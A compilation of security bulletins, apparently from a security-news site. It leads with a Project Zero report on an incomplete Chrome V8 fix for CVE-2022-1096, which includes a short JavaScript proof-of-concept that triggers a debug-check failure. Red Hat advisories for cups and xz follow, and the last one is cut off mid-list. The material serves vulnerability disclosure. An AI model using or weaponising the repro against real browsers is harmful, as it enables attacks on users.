Chrome suffers from having an incomplete fix for CVE-2022-1096.

    Chrome: Incomplete fix for CVE-2022-1096VULNERABILITY DETAILSThe fix for https://crbug.com/1309225 has modified `SetPropertyInternal()` to fall back to `SetSuperProperty()` whenever a property access interceptor is encountered because `SetSuperProperty()` is robust against possible side effects caused by interceptors.Unfortunately, the function `JSObject::DefineOwnPropertyIgnoreAttributes()` is also affected by the bug and requires the same change.VERSIONGoogle Chrome 100.0.4896.60 (Official Build) (arm64)Chromium 102.0.4972.0 (Developer Build) (64-bit)REPRODUCTION CASETo make the exploit functional again, the attacker only needs to replace one property store with an `Object.defineProperty()` call:```<script>style = document.createElement('p').style;Object.defineProperty(style, 'prop', {  value: { toString() { style.prop = 1 } }});</script>```The repro case above triggers the same DCHECK failure:```## Fatal error in ../../v8/src/objects/map.cc, line 437# Debug check failed: map->instance_descriptors(isolate) .Search(*name, map->NumberOfOwnDescriptors()) .is_not_found().#```CREDIT INFORMATIONSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2022-06-28.Related CVE Numbers: CVE-2022-1232,CVE-2022-1096.Found by: glazunov@google.com

Chrome CVE-2022-1096 Incomplete Fix

Red Hat Security Advisory 2022-4990-01 - The Common UNIX Printing System provides a portable printing layer for Linux, UNIX, and similar operating systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups security update  
Advisory ID:       RHSA-2022:4990-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4990  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-26691   
=====================================================================

1. Summary:

An update for cups is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which  
gives  
a detailed severity rating, is available for each vulnerability from the  
CVE  
link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Common UNIX Printing System (CUPS) provides a portable printing layer  
for  
Linux, UNIX, and similar operating systems.

Security Fix(es):

* cups: authorization bypass when using "local" authorization  
(CVE-2022-26691)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2084321 - CVE-2022-26691 cups: authorization bypass when using "local" authorization

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
cups-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-client-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-devel-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-ipptool-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-lpd-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-printerapp-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm

noarch:  
cups-filesystem-2.3.3op2-13.el9_0.1.noarch.rpm

ppc64le:  
cups-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-client-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-devel-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-ipptool-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-lpd-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-printerapp-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm

s390x:  
cups-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-client-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-devel-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-ipptool-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-lpd-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-printerapp-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm

x86_64:  
cups-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-client-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.i686.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-devel-2.3.3op2-13.el9_0.1.i686.rpm  
cups-devel-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-ipptool-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-lpd-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-printerapp-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
cups-2.3.3op2-13.el9_0.1.src.rpm

aarch64:  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-libs-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.aarch64.rpm

ppc64le:  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-libs-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.ppc64le.rpm

s390x:  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-libs-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.s390x.rpm

x86_64:  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-client-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.i686.rpm  
cups-debugsource-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-ipptool-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-libs-2.3.3op2-13.el9_0.1.i686.rpm  
cups-libs-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-libs-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-lpd-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.i686.rpm  
cups-printerapp-debuginfo-2.3.3op2-13.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-26691  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqpyONzjgjWX9erEAQivKA//a6QQWxm7i+NbhcVKNCvCXKtVa8aPt04Z  
mtAojP0b59ifL1QjXr1Kr+pbW/oCP2fxdB2kN1L38mMo/u2pbM3DH4xVA709RgT0  
ZHrnryfYjSyRq52/y9PNfUch6tOQAYIlfq7fdLGwSp94xTX+duvkDiyH30RHPlay  
glx/yjQvJzzbmClvl8oTU3qQngWmfrdVQlTjf9nUu3YiAfm8DkEE/wYEksOuKaRF  
xXVLSHXf3KVoMIidsEJPSBxFzxrbvT5Ggk7E2A7bRrmk67s7XUuFnATq9eypVXBu  
CGd00xIIvDHXtgqoHFPuBexqf9PLiIJ+I4XNT/2SCAMoqr6Csw2cZ+WrHMuIN2Uy  
Tf7RwazB7FUEf/7+YYE1o66UGFHs19lX24r2pixgFQI5PW7WKNLNVqfkuHogACnP  
CmiNoV/WHwDisuqi1jaT+JB+Yy3aRsCY+gVM0T6PzOKIgUptOKnbGnGexTak1qar  
NMT73SOTIeh7fL3cBd3I8ZK/ZX+0PdglxCpiEJbhIKnmQwSJIkdl+gSU/6078TdO  
tyDqBJgn8YyoFhAliaNq42T6kIVObtHwqpHwlgTPcKkiVWS5YHzdDBrykS+Z9/Eq  
DDpvi2UJn6AMaRk8Gs/RRWaaTiALNIRI5ipb6fM8TRYgW/Z9lKH+rjyInN48sMRJ  
ZFVu8coCFgE=  
=V3ej  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4990-01

Red Hat Security Advisory 2022-5052-01 - XZ Utils is an integrated collection of user-space file compression utilities based on the Lempel-Ziv-Markov chain algorithm, which performs lossless data compression. The algorithm provides a high compression ratio while keeping the decompression time short.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: xz security update  
Advisory ID:       RHSA-2022:5052-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5052  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-1271   
=====================================================================

1. Summary:

An update for xz is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

XZ Utils is an integrated collection of user-space file compression  
utilities based on the Lempel-Ziv-Markov chain algorithm (LZMA), which  
performs lossless data compression. The algorithm provides a high  
compression ratio while keeping the decompression time short.

Security Fix(es):

* gzip: arbitrary-file-write vulnerability (CVE-2022-1271)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2073310 - CVE-2022-1271 gzip: arbitrary-file-write vulnerability

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

ppc64:  
xz-5.2.2-2.el7_9.ppc64.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64.rpm  
xz-devel-5.2.2-2.el7_9.ppc.rpm  
xz-devel-5.2.2-2.el7_9.ppc64.rpm  
xz-libs-5.2.2-2.el7_9.ppc.rpm  
xz-libs-5.2.2-2.el7_9.ppc64.rpm

ppc64le:  
xz-5.2.2-2.el7_9.ppc64le.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64le.rpm  
xz-devel-5.2.2-2.el7_9.ppc64le.rpm  
xz-libs-5.2.2-2.el7_9.ppc64le.rpm

s390x:  
xz-5.2.2-2.el7_9.s390x.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390x.rpm  
xz-devel-5.2.2-2.el7_9.s390.rpm  
xz-devel-5.2.2-2.el7_9.s390x.rpm  
xz-libs-5.2.2-2.el7_9.s390.rpm  
xz-libs-5.2.2-2.el7_9.s390x.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
xz-compat-libs-5.2.2-2.el7_9.ppc.rpm  
xz-compat-libs-5.2.2-2.el7_9.ppc64.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.ppc64.rpm

ppc64le:  
xz-compat-libs-5.2.2-2.el7_9.ppc64le.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64le.rpm  
xz-lzma-compat-5.2.2-2.el7_9.ppc64le.rpm

s390x:  
xz-compat-libs-5.2.2-2.el7_9.s390.rpm  
xz-compat-libs-5.2.2-2.el7_9.s390x.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390x.rpm  
xz-lzma-compat-5.2.2-2.el7_9.s390x.rpm

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqod9tzjgjWX9erEAQhznQ/6A5c86aUD64VtP1fn/0w9WosRYgk+cuwi  
k/YNc8W7uz3DEUwFb6cLRldBT+EwG5I8C/5/JfbS44mCBwQl8a16jv+58V7Hz6XO  
2AhG+cEf/8dlLobZaPKayDj9IMjrBbQUPWXhd38dhHzn2C1Aq3CFs2K2ZyDq64jT  
GwgcYcb0obkysZTibs9ACTq4lxI3UMNOKZlb+prQ+ddSkBTtBAoPLP+DLy+f3FB+  
2xc1SHZQjO4D2xeMCGoye4Q0MWG31mCuXQqEObTUcM+G747BKoi+R7LEgjXG93rv  
KbVJbFs/DRSQ/7ltR/kSu+xkTDisr3llCfzv7bPqjTCax6j1SBfJC1XGzwwuMFLo  
1kz/lntw8lSvUyipjwtV2iU/j5aam6rJs9fDpN4ceFDMXHQ4A19IUMGi2IJSGFNP  
0/vaJqwb8NN0MIZwSShgLqoRK8/eQJIadytWJ+Rwu6gEZvHYyCAGRHqNIDk9CGGG  
Aa0tRH9Hkh/EQchcbYz2WZ5fhCE1pX08fWgQfp7R7X65tSnXwky6Lfqej3yGXMs2  
CGXGJT8lMsPca4WC4v8SUh5MiUJ4KlTuvxnnJG8tCaNHFRRfU9pciEAdeTUaBm6U  
RZTLKoOdYHyLJak8OyvA3V5GNKeKWYk6N533jDtw/slMBJoa+44u3o+Ol7Zq0FWc  
SeB0A7Uonb8=  
=5KUh  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5052-01

Red Hat Security Advisory 2022-5056-01 - The Common UNIX Printing System provides a portable printing layer for Linux, UNIX, and similar operating systems. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups security and bug fix update  
Advisory ID:       RHSA-2022:5056-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5056  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-26691   
=====================================================================

1. Summary:

An update for cups is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Common UNIX Printing System (CUPS) provides a portable printing layer  
for Linux, UNIX, and similar operating systems.

Security Fix(es):

* cups: authorization bypass when using "local" authorization  
(CVE-2022-26691)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* 30-second delays printing to Windows 2016 server via HTTPS (BZ#2073531)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the cupsd service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2084321 - CVE-2022-26691 cups: authorization bypass when using "local" authorization

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
cups-2.2.6-45.el8_6.2.aarch64.rpm  
cups-client-2.2.6-45.el8_6.2.aarch64.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.aarch64.rpm  
cups-devel-2.2.6-45.el8_6.2.aarch64.rpm  
cups-ipptool-2.2.6-45.el8_6.2.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-lpd-2.2.6-45.el8_6.2.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm

noarch:  
cups-filesystem-2.2.6-45.el8_6.2.noarch.rpm

ppc64le:  
cups-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-client-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debugsource-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-devel-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-ipptool-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-lpd-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm

s390x:  
cups-2.2.6-45.el8_6.2.s390x.rpm  
cups-client-2.2.6-45.el8_6.2.s390x.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debugsource-2.2.6-45.el8_6.2.s390x.rpm  
cups-devel-2.2.6-45.el8_6.2.s390x.rpm  
cups-ipptool-2.2.6-45.el8_6.2.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-lpd-2.2.6-45.el8_6.2.s390x.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.s390x.rpm

x86_64:  
cups-2.2.6-45.el8_6.2.x86_64.rpm  
cups-client-2.2.6-45.el8_6.2.x86_64.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.i686.rpm  
cups-debugsource-2.2.6-45.el8_6.2.x86_64.rpm  
cups-devel-2.2.6-45.el8_6.2.i686.rpm  
cups-devel-2.2.6-45.el8_6.2.x86_64.rpm  
cups-ipptool-2.2.6-45.el8_6.2.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-lpd-2.2.6-45.el8_6.2.x86_64.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
cups-2.2.6-45.el8_6.2.src.rpm

aarch64:  
cups-client-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.aarch64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-libs-2.2.6-45.el8_6.2.aarch64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.aarch64.rpm

ppc64le:  
cups-client-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-debugsource-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-libs-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.ppc64le.rpm

s390x:  
cups-client-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-debugsource-2.2.6-45.el8_6.2.s390x.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-libs-2.2.6-45.el8_6.2.s390x.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.s390x.rpm  
cups-lpd-debuginfo-2.2.6-45.el8_6.2.s390x.rpm

x86_64:  
cups-client-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-client-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-debugsource-2.2.6-45.el8_6.2.i686.rpm  
cups-debugsource-2.2.6-45.el8_6.2.x86_64.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-ipptool-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
cups-libs-2.2.6-45.el8_6.2.i686.rpm  
cups-libs-2.2.6-45.el8_6.2.x86_64.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.i686.rpm  
cups-libs-debuginfo-2.2.6-45.el8_6.2.x86_64.rpm  
